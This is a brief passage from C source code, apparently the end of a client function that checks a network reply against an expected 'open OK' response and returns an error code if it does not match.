if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {
fprintf(stderr, "Open failed.\n");
return 5;
}
return 0;
}
#